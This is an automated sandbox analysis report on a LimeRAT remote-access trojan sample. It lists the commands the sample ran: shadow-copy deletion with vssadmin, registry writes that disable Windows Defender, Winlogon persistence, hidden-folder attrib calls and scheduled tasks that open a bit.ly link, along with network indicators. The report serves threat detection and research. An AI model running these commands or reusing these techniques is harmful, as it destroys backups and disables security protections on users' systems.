Malware Analysis Report

2024-09-11 10:21

Sample ID 240618-zrnlnswerh
Target ccc.exe
SHA256 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
Tags
limerat defense_evasion evasion execution impact persistence ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e

Threat Level: Known bad

The file ccc.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact persistence ransomware rat trojan

Limerat family

Modifies Windows Defender Real-time Protection settings

Modifies security service

Contains code to disable Windows Defender

LimeRAT

Modifies WinLogon for persistence

Deletes shadow copies

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Hide Artifacts: Hidden Files and Directories

Unsigned PE

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-18 20:57

Signatures

Contains code to disable Windows Defender

Limerat family

limerat

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 20:57

Reported

2024-06-18 21:00

Platform

win10v2004-20240611-en

Max time kernel

164s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccc.exe"

Signatures

Contains code to disable Windows Defender

LimeRAT

rat limerat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3336 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 4644 wrote to memory of 2764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4644 wrote to memory of 744 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 3336 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3336 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 1608 wrote to memory of 2060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2016 wrote to memory of 1528 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4116 wrote to memory of 4796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4920 wrote to memory of 4676 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4896 wrote to memory of 2196 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5100 wrote to memory of 2004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 972 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4368 wrote to memory of 2768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 2736 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 3860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4228 wrote to memory of 896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5020 wrote to memory of 4036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4656 wrote to memory of 740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3336 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3336 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccc.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:39" /sc daily /mo "2" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "07:55" /sc daily /mo "4" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "17:29" /sc daily /mo "5" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:00" /sc weekly /mo "3" /d "Tue" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:57" /sc monthly /m "may" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 64.40.144.30:49154 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 172.67.19.24:443 tcp

Files

memory/3336-1-0x0000019D64BA0000-0x0000019D64BE2000-memory.dmp

memory/3336-0-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

memory/2420-2-0x0000021AE9620000-0x0000021AE9642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b53ab1jv.25w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2420-12-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-13-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-14-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-15-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-18-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/3336-20-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

memory/3336-21-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 161cd662c124f1408ccbd57a752a8d5f
SHA1 7baad97316f0cbf1b35d9b0b2b3a8d19da852d41
SHA256 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
SHA512 ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac

memory/3336-33-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp